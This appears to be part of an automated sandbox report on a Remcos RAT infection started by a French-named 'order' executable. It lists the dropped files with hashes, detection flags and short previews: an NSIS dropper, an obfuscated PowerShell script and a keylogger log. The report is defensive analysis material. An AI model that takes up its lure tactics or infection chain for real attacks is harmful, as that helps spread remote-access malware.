                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.1.0.8.3.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2369759790525285
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguWT0QU0Q00QgS0QXz0Qt0QATNtgjXokwszeuzSzbxGQI5zmxq:pgle+u3cfwoeyOkNR
                                                      MD5:F35A0C4AC204AE3BA51A168D0B3F80DE
                                                      SHA1:80BFFA90B21A1BE0B73B32947A1D50CD9039EECA
                                                      SHA-256:31187DB8DD11005EBC8A1C5D733E1023FB65C7B2FD61157843A70547CBC97598
                                                      SHA-512:55C52B9D0F6CD4958D9792037A1CF912C6C93854F684CB8D4388AB13FF5AB7321770AACFF2A0C2D4300A016118A68ED3FEB94630D72F9153257FD581AE7ED5DC
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.3.9.9.2.2. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.239799588279947
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguW0O0QV0Qg0Qg20QXX0QC0Qb69gVXm2szeuzSzbxGQI5CmKsK:pgle+upOt1oeyOkNmF
                                                      MD5:10E8A120AFD7C63C60309911BE2151CB
                                                      SHA1:12A1360D0744CE2BCF3B3E24FC0DAEA6ADEA2B45
                                                      SHA-256:44B36A780E5F4DDBB67A531E93117F15B89CCEFB7B508B60CF79390555B8C86D
                                                      SHA-512:F007EE94AFB64C4A8DCA15ADE8301BA5DFA970FDFD198ED2C2A69F090258D326FF391A0CBE0DBDBACAE67AE3223EF9181F51A58BD8B05337FE4C45B4D59E25BC
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.8.1.4.6.8.3. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2347909255314224
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIi+kXkkXfkuguW+0QU0Q10QgN0QXH0Q40QBrtgjXGhPszeuzSzbxGQI5zmesK:pjle+uzRwoeyOkNLF
                                                      MD5:F48DC545F5A57BAB931C9A1985EC43B0
                                                      SHA1:2137CAC0D256E8529C9496ACB88CDE19386A8594
                                                      SHA-256:A6AE5A8E584666596233894D3E13229169015EE0D3BE0279CC8E75F6B5091C0A
                                                      SHA-512:F86BFE29323DF3E302339A94E38BBA03096D7020598FC02BC7A76A606EC0266822C6BF8C22C552CBC0C3896D47C0D018D96CE51CC3E4A5D0B9002CF7E4099132
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.8.8.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.8.4.0.4.1.0. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.2313309032570565
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIi+kXkkXfkuguW10Qg0Qb0Qgj0QXm0Qg0QYrgYgwXSZszeuzSzbxGQI5zm08y:pjle+uwX/oeyOkNtd
                                                      MD5:73D255CC171CC754EE5E0666754C66DB
                                                      SHA1:BC2A1108B8DD2FAA80AB11484C02D3A51BABB370
                                                      SHA-256:BE9BD1FF21B1BAE41F19E0D2C860A5E5331B7BA40D9D34FBE047D4C5E241A678
                                                      SHA-512:A288A3D4C243DFCD78817BD314434E3C72F7353F99F4F17126C563E6158FF8046AD1E4A234B484FDE03C6C9C1B8EA14B3A6B6FBB009ED59CC39F76F1A4863034
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.8.8.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.0.8.5.1.9. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4734
                                                      Entropy (8bit):3.239045266160915
                                                      Encrypted:false
                                                      SSDEEP:96:pwpIitkXkkXfkuguWT0Q40Qc0QgZv0QXa0Qr0QtzNhg8XZLszeuzSzbxGQI5Cm+F:pgle+u7p6oeyOkNSF
                                                      MD5:A421D411E3980B25CAAADC6DD580A9C8
                                                      SHA1:26DAD6CFF8C444F8DF532E01C393D942FC49F3C5
                                                      SHA-256:C4AA417FCDBACD99330096DA903AFA2228CC13307B392EAB063BD51A757913BF
                                                      SHA-512:CF94C786B7DFDB61A27624A39ABFB7EA07F99AA2BB1B3C6D755EFAFF6DA88921988C82452441CBB661FF08FB583B99579E82992F7A6957E4298EF980C655169E
                                                      Malicious:false
                                                      Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.6.1.6.5.6.6. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):408873
                                                      Entropy (8bit):7.618522049007463
                                                      Encrypted:false
                                                      SSDEEP:12288:P2cR6xsOAMzlI3mHDvokHaO5U5r4QK+/e4coLjO4rZ2EK/:PT8zBjAkHaOUH3O+Z25
                                                      MD5:ADDC8AD98D1A3FF426E4045CF514D3EC
                                                      SHA1:0B5F4BFF209FF218386A7D5B62CD099253A4B005
                                                      SHA-256:E7B09720ABE4127C6CB04AEAB03B9C634395D5F41BE4A6AA88F488BD996480B8
                                                      SHA-512:F8C802371B7509989B626462ED383FE7E5C2F92DD23A5332EA49411B0267832E6C28E2D95158B1752F11A275426E09FDC7D9D8D13FC0DD4E27E1ED929C143CCD
                                                      Malicious:false
                                                      Preview:........,...................6...............................................................................................................................................................................................................................................................J...o...............j...............................................................................................................................~.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):561426
                                                      Entropy (8bit):7.108663972875578
                                                      Encrypted:false
                                                      SSDEEP:12288:47YvE3TaaFpfEwmgfwwQxeoKGaGsIMcgLvlU2eZysZMNue:bENj7JgaRe0VN9
                                                      MD5:EDEB34F392872F3C9E220BC9DCF9BA86
                                                      SHA1:E9FB6FF7CD47EC7B08391F4C1ECC1E684BF28FF7
                                                      SHA-256:39E37A6736984B617A47818FFDBD202199C75F769821D4939F1D61DFF621098D
                                                      SHA-512:F33BC39692838CC94AE0ED6AEDDDFCECB8FD564DE6DE0D81A258ECE57EBA04CB7820F1FE834E48B4E0CBCE95409449514BB645E69584AD62E0439FEA306AF424
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 26%
                                                       • Antivirus: Virustotal, Detection: 27%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................`...............................................s....... ...4...........................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...............r..............@....ndata.......@...........................rsrc....4... ...6...v..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:ASCII text, with very long lines (409), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):409
                                                      Entropy (8bit):4.269623571994858
                                                      Encrypted:false
                                                      SSDEEP:6:dHBe6/CfTF/MKFJJ2VVYOeCVdHkQs5kUrL7iDu41l7W9ADhEATE1MhdyK+ivv:dheFfTFjFJYRs5fLmDugl73DrmavfH
                                                      MD5:16234C20D3324265BB707C0DA0A316F8
                                                      SHA1:994ABB6985951CE456AF1468C3A74BBE53D2348A
                                                      SHA-256:75F66C61F6AE6C8E75466D750D71DB4385ABBBE93C9C5677D9DF74B5F741F99C
                                                      SHA-512:B50103F5820889FB40A397A727AE64FBB91A1D02C6CA341B00FAE3EF11FCC02C858F24CAF18B35991D4197789D3EDD3C068842A0E3D2F9B1293E35E8FD5AD733
                                                      Malicious:false
                                                      Preview:chuffer udenlandsk unthinkable tjrerne,udfri recepturens lituiform taimi borstall salgsinformation fejlplaceres.meddelelsesmiddelet languisher wileproof degami kammerherreinder epitheloid arith,cabbing naturfarvet xanthochroi voldgraven.araucarioxylon flageolettone redd bykologi debitorkontoen blinddrenes brevstemtes.stellular tintie recontested andenklasseskupkderne ansaas spotlights undersgelsesomraadet,
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2830
                                                      Entropy (8bit):4.838170566476968
                                                      Encrypted:false
                                                      SSDEEP:48:nJxVhlYzClcqDye0Wr/yp00EoYSR/8Wc2nqIjoMSj6yoPPOiWFenjA9Eljyr/Q:nlhlYWry/Sm3EE+EnKMSGfuNeSElGro
                                                      MD5:90A8F9376B587851CE0CF60BD203101F
                                                      SHA1:5833830004E7017DA574A4F3C69D27874C28F400
                                                      SHA-256:770970BF93905583E7305F1E80755C0582D0B01009BCBB8CEA0FA6BD28E9D645
                                                      SHA-512:98FA1DAE524D113E1736AD371AC7C8FF3FDCD959B4612B714A57BD36F180C42430CD199D1B98A48529B322CED110A68C7F80E18252D2A1CB4BAB08AF58EBE5D1
                                                      Malicious:false
                                                      Preview:...y.E....:......~................PW......*~...-U.............ci.....0.^,...........t............O.r.......(..K.....1.... ...Lf)........+............s;.......E.....C".O....."..?`..n.............]....qs.............e.d........h.N....Q2...r..bq............!l.....8........z.......S........g.2.#..,:...p.?.............*.............6...s....4......G....Mz....c....l..O...6.......... ..........6........Q.[..@0...?.*.-....B.....,.....?..e........3........f{.$......,]@..P...H....#..3rV..Et...5....k.M........J...F...Ni.......xnJ...l.i.....'4>"R............oQ..q..!.........1..IN................a..........._..........U.m.....K.............q........?..r...........>.3.....R.......Z.3..........1..U..X>b....E....?..0.............Hs...............Y..o.8...n...............D....>..p....g.j...e....L..........`...l.%mq...........L.&...A.].M......^............+.....p............A..!.p.y..........E......W.4.....{.....'...."4......d~...5....+........../3.`....J.........U.........'.^.................,...
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):2999
                                                      Entropy (8bit):4.923587551956379
                                                      Encrypted:false
                                                      SSDEEP:48:SNwJkKO6C9omNsm4bYelK0Lzqi2QF/cHn81RY3FfAqK/M5LLbR4lAbe8GU5nHkzG:BJu6mpOkVK23FJK/UFoge8G2Hka
                                                      MD5:C2D8CAB2DF0C5184A51CAD4F321A64CC
                                                      SHA1:2068EC7CBEE9BB22651B84CDFDB5258B62EA95EE
                                                      SHA-256:21DFA4EABFF3CA8CF50F2AD48AB42EB1616B76DCBCDAE86705A4FFC204A36258
                                                      SHA-512:0D521DF41C6C415FAA84244F153CFD653574356F21AE55A9CDBC24B7A8825454A661483A1405BB3AE71F067C7BFE7D1A4E729AFC23A5346C36A524329A28D37B
                                                      Malicious:false
                                                      Preview:..........._..x.2.y6.N.+5......y..ewe.......;u........v......;2.....O....=.8i.....l........-.......#.......rn......c2J...[.7.......x..?..q............./=...........&.......j..........`..n..O.`....E.#.....>..............U.....................E....<.y...z....6.U..............m.y..........#M.'..............B..Z......m../..B..!......................}...g.7........,.>........l..............;$...c..m...5.=......h.j*...'W..........*..........P..l....{.....=Q......yX.......1....Nns........'.....\.u.....r..k.....:'....0............N$).....QY......8Z..k.........J....7.M.......9\3....M.e....y0.{....s..z.F.....X.Y.%....".6.....A.J.....M...........Q.?.e.G....T....{.A...@"........r....|.b.i......6........... ......U......j............F}..........l...z.(......a@...]...I......R......Z...q.....|.........o.;...o.....x..#.....`.o..q....j..S.A.............k.-II.z..f..............?........p.............2.P...........A...... ........F....y...~....1......*V.......w,.........^...w.(.GL|..T..}..J......U.
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:ASCII text, with very long lines (57941), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):57941
                                                      Entropy (8bit):5.366975130385102
                                                      Encrypted:false
                                                      SSDEEP:1536:M2JnexhWTLwrzAPNCVjXRFnhoMMesE5FxGFlAqfq+7:MGghWPwrMeh9b2ELxGFl77
                                                      MD5:19779840EECFC141420A08CB9A741962
                                                      SHA1:0F0A168BC292914DA146F667557FF5F07B0F5AE5
                                                      SHA-256:DE1FC8DC64B49C5AE8C2C9C45E7DD4D2AA154F845E99A8E8FA08B5ABF23D38A7
                                                      SHA-512:D3BE08E433F93BAFC5D53EA6E91C53E01D755BF1C61E4006AA184DA35644B343BD72D0DDBEE9820DB107C2DF212DC4A51A4E06EBF3CF6C1E45ED250F2B383723
                                                      Malicious:true
                                                      Preview:$Recitativos=$eksperimentalteatresntrffendes;<#Produktionsreglen Starttilstandens Oceanologien interpolationen Jernbanearbejdere Inviolable Evolutionistens #><#Subtropic Conformator Fagald Spinogalvanization Nether Maracock deployeret #><#Markedstallene Samejes Sveskegrd #><#Pneumococcal Danielson Bulbed Nattevagt Centilongs Phoneticise #><#Gawkers Hummerkdet Sugefoden Afsiges Edeotomy Smudsafvisendes Marlenes #><#Skralds Nodosarian Robinsonadens Tannaic Knibtangsbevgelsen #><#Straightforwardest Forebow Amorph Quininises tvrvidenskabelig Energiagenturer Tabulerede #><#Toadish Keweenawan Bgespinder Attesteret Ladakin #><#Cerianthid Underinddelte Podsolized Ligbleges Mishandle Silverite #><#Virussets Spydskes Theosophic #><#Frimrkesamleres Amyridaceae Communes #><#Parkeringslygternes Mycelier ndringsforsg Sdedes Euphorbium #><#Incompetence Regionplanretningslinie Stiftelsesoverenskomsternes Variolization Asketernes Unpunctually #><#Prodisarmament Yderigeres Phlegmaticness Caoutchoucin Ud
                                                      Process:C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):339396
                                                      Entropy (8bit):7.680669650160453
                                                      Encrypted:false
                                                      SSDEEP:6144:Vg2nMcR6xsO57WM9Z+a+Ii3D66xODvok9RaO3JtwL5gWwA76WwQK+/eKk7EcorXX:V2cR6xsOAMzlI3mHDvokHaO5U5r4QK+b
                                                      MD5:4FEF7EC4AA88C70E0E50AF8288552883
                                                      SHA1:93FB76EB5D63D8BD92CB962E8F6CA7C8E7AE5950
                                                      SHA-256:286B9DF7B42E7F021BB5EEBE1B6E00D6178F01A4B308244CABFD955CD91B5D60
                                                      SHA-512:9F386415243A791B58853C00C378AA57D3AA69F3E690E452220DA92D5B4888A0C35099B20EBC9672B0797BCD58091FCA8D1F0BD75A616B164896531B8206B1CB
                                                      Malicious:false
                                                      Preview:.....C.%%%%......::::..I....5.......].===..................D....................=.'..SSS.......;...&&.....!!!!.........,,.N...7.......i..........T.........HHH.................w.^..................................FF...mmm.|..........K.....333333...$..WW....r...................*.....?..&&&&......._.......66.......ss.M.................YY..n...kkkkk.........||.7.4444.........f.hh...........PP...........OOOOO..aa.mmm........... .............................L.........................c.......kk.............................'....333...........'.....................VVVV.....5.k.........r............s......,,..s............b..........e.?...................22....l............y..H.....m.......A.S.)....5.<<<..-.....................P..........%..............k..........77...............E..=......."..Z.........................M.kk..........2.......e..................==...........qqq..0.rr..[...........c........ii...............''......................?????......H. .....BBBBB..........................
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288
                                                      Entropy (8bit):3.30006269448478
                                                      Encrypted:false
                                                      SSDEEP:6:6l+H5YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6lsec0WFe5BWFe5BW+
                                                      MD5:4A2695C75A24110CD5F7A4598D75F7EF
                                                      SHA1:C6D6F9042A471B85A04869EDEB46004C647AFDA9
                                                      SHA-256:704C44B71289C2D89E2C36EE68916DEA5566A70E67822BC6BA653E9B980963E8
                                                      SHA-512:324CFEB68F6D62EEFC921D087D82EB6982829E22B04149ECFD61B504D6DAAF1C4E0B740757C31D5AEDE8CF5AE2F56956F9CEF970334B2ECE633FEE5861095856
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mqerms.dat, Author: Joe Security
                                                      Preview:....[.2.0.2.4./.0.4./.2.6. .0.7.:.4.4.:.2.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.469220245977231
                                                      Encrypted:false
                                                      SSDEEP:6144:fGzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNHjDH5S:AZHtYZWOKnMM6bFpFj4
                                                      MD5:27DBC1AC5722F0D395E90393B957E538
                                                      SHA1:75B17AA81CE8A0AFDEA63F972AE7B37D3EBBFB3C
                                                      SHA-256:2F61F4E1BD7B4FDF724EC95AD257C7ED5615359179451A2D4385F43FE9427BB0
                                                      SHA-512:13B4EA1006663DC77BE1EB122A06EDE4E7B2B22EA1E61CCC28022A951B529D19BEE58E7E9EF90F2EFFF819AFBE58770183012783359C5C679E904CDBA34DCC16
                                                      Malicious:false
